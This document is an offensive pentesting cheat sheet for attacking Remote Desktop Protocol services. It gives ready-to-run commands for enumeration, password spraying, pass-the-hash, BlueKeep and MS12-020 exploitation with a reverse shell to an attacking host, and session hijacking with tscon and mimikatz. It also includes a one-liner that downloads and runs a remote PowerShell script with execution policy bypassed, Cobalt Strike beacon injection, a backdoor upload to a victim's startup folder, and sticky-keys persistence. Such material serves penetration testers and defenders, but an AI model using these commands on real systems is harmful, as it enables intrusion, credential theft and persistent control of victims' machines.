Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the other computer must run RDP server software.
NLA will allow us to authenticate the user before the opening of an RDP session, thus avoiding unnecessary demands on the server if the person cannot authenticate. The CredSSP protocol is used for authentication.
Practice
Enumerate
We can use nmap to enumerate informations about the running RDP server
# Enum NetBIOS, DNS, and OS build version.nmap-p3389--scriptrdp-ntlm-info<target># Enum available encryption and CredSSP (NLA)nmap-p3389--scriptrdp-enum-encryption<target>
#Hydrahydra-L<userslist>-p'password123'rdp://<IP>#NetExec - Spray on targetnetexecrdp<IP>-u<userlist>-p'password123'#NetExec - Spray on subnetnetexecrdp10.10.10.0/24-u<userlist>-p'password123'
Logging in
We can use xfreerdp to connect into a RDP server with known credentials or using Pass the hash technique.
#With credentials xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>#Dynamic screen, clipboard and mount local folder as SMB share on the RDP server xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP> +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share
#Pass the hashxfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP>
We can use rdesktop to connect into a RDP server with known credentials
rdesktop-d<domain>-u<username>-p<password><IP>
Using the rdp_check.py script from impacket, we can check if some credentials are valid for a RDP service
pythonrdp_check.py<domain>/<name>:<password>@<IP>
Using netexec, we can check if some credentials are valid for a RDP service
netexecrdp<IP>-u<user>-p<password>
Headless RDP
Executing commands on a remote host is possible by using a headless (non-GUI) RDP lateral movement technique brought by a tool called SharpRDP.
#Execute commands on DC01 from a compromised system with offense\administrator SharpRDP.exe computername=dc01 command=calc username=offense\administrator password=123456
Vulnerabilities
MS12-020 (CVE-2012-0152)
This CVE address a denial of service (DOS) vulnerability in the Remote Desktop Service.
Tools like nmap can be used to detect the presence of the CVE-2012-0152 vulnerability without crashing the target.
nmap-sV--script=rdp-vuln-ms12-020-p3389<target>
We can use this python exploit (do not forget to change the hardcoded IP)
python2.7ms12-020.py
BlueKeep - CVE-2019-0708
RDP uses "virtual channels", configured before authentication, as a data path between the client and server for providing extensions. RDP 5.1 defines 32 "static" virtual channels, and "dynamic" virtual channels are contained within one of these static channels. If a server binds the virtual channel "MS_T120" (a channel for which there is no legitimate reason for a client to connect to) with a static channel other than 31, heap corruption occurs that allows for arbitrary code execution at the system level.
Bluekeep or CVE-2019-0708 is an RCE exploit that effects the following versions of Windows systems:
Windows 2003
Windows XP
Windows Vista
Windows 7
Windows Server 2008
Windows Server 2008 R2
Windows 8,10,11, Windows Server 2012 and above are not affected
If the target uses RDP and the Windows version is mentioned above, it is vulnerable.
# Check OS version & RDP service using nmapnmap-O-p3389<TARGET_IP>
Alternatively, we can use the rdp_detect_info.py from worawit github to detect the vulnerability
pythonrdp_detect_info.py<TARGET_IP>
Additionally, we can use metasploit to scan a target
msf> useauxiliary/scanner/rdp/cve_2019_0708_bluekeepmsf> setRHOST<TARGET_IP>msf> run
To exploit, we may use the RICSecLab exploit on GitHub to gain a revers shell
This exploit have been made for Windows 7 targets
Exploit may cause the system to crash
#Build your environmentgitclonehttps://github.com/RICSecLab/CVE-2019-0708&&cdCVE-2019-0708gitclonehttps://github.com/gosecure/pyrdp.git&&cdpyrdppython3-mvenvvenvsourcevenv/bin/activatepip3install-Upipsetuptoolswheelpip3install-U-e'.[full]'cd..rmexploit.pywgethttps://raw.githubusercontent.com/yassineaboukir/CVE-2019-0708/4f4ff5a9eef5ed4cda92376b25667fd5272d9753/exploit.py#Exploitpythonexploit.py<TARGET_IP>-rp<RDP_PORT><ATTACKING_IP>-bp<ATTACKING_PORT>
We can easily exploit this vulnerability using a metasploit frameworks
With SYSTEM permissions you can access any opened RDP session by any user without need to know the password of the owner. It only use Windows tools and features.
On the target system:
#Get openned sessionsquery user#Access to the selected sessiontscon <ID>/dest:<SESSIONNAME>
When you access an active RDP sessions you will kickoff the user that was using it.
We can perform this attack with mimikatz
mimikatz> ts::sessions#Get sessionsmimikatz> ts::remote/id:2#Connect to the session
Shadow Attack
AutoRDPwn is a post-exploitation framework created in Powershell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim's desktop without his consent, and even control it on demand, using tools native to the operating system itself. More info here
#Local execution one-linerpowershell -ep bypass "cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"#From target on reverseshell - create the AutoRDPwn:AutoRDPwn user (mmay try w/o admin rights with -noadmin)powershell -ep bypass "cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"
#Connect to shadow sessions with created credentialsmstsc /v win10pro /admin /shadow:1/control /noconsentprompt /prompt /f
RDP Process Injection (rdpclip.exe)
If someone from a different domain or with better privileges login via RDP to the PC where you are an Admin, you can inject your beacon in his RDP session process and act as him.
# Supposing the group "External Users" has RDP access in the current domain## lets find where they could access## The easiest way would be with bloodhound, but you could also run:Get-DomainGPOUserLocalGroupMapping -Identity "External Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName
#orFind-DomainLocalGroupMember-GroupName "Remote Desktop Users"| select -expand ComputerName# Then, compromise the listed machines, and wait til someone from the external domain logs in:net logonsLogged on users at \\localhost:EXT\super.admin# With cobalt strike you could just inject a beacon inside of the RDP processbeacon> ps PID PPID Name Arch Session User--------------------------- ...49601012rdpclip.exe x64 3 EXT\super.adminbeacon> inject 4960 x64 tcp-local## From that beacon you can just run powerview modules interacting with the external domain as that user
If a user access via RDP into a machine where an attacker is waiting for him with admin privileges, the attacker will be able to inject a beacon in the RDP session of the user and if the victim mounted his drive when accessing via RDP, the attacker could access it.
In this case you could just compromise the victimsoriginal computer by writing a backdoor in the statup folder.
# Wait til someone logs in:net logonsLogged on users at \\localhost:EXT\super.admin# With cobalt strike you could just inject a beacon inside of the RDP processbeacon> ps PID PPID Name Arch Session User--------------------------- ...49601012rdpclip.exe x64 3 EXT\super.adminbeacon> inject 4960 x64 tcp-local# There's a UNC path called tsclient which has a mount point for every drive that is being shared over RDP.## \\tsclient\c is the C: drive on the origin machine of the RDP sessionbeacon> ls \\tsclient\c Size Type Last Modified Name------------------------- dir 02/10/202104:11:30 $Recycle.Bin dir 02/10/202103:23:44 Boot dir 02/20/202110:15:23 Config.Msi dir 10/18/201601:59:39 Documents and Settings [...]# Upload backdoor to startup folderbeacon> cd \\tsclient\c\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startupbeacon> upload C:\Payloads\pivot.exe
Persistence - Sticky Keys & Utilmans
Using stickykeys or utilman as a persistence vetcor, you will be able to access a administrative CMD and any RDP session anytime
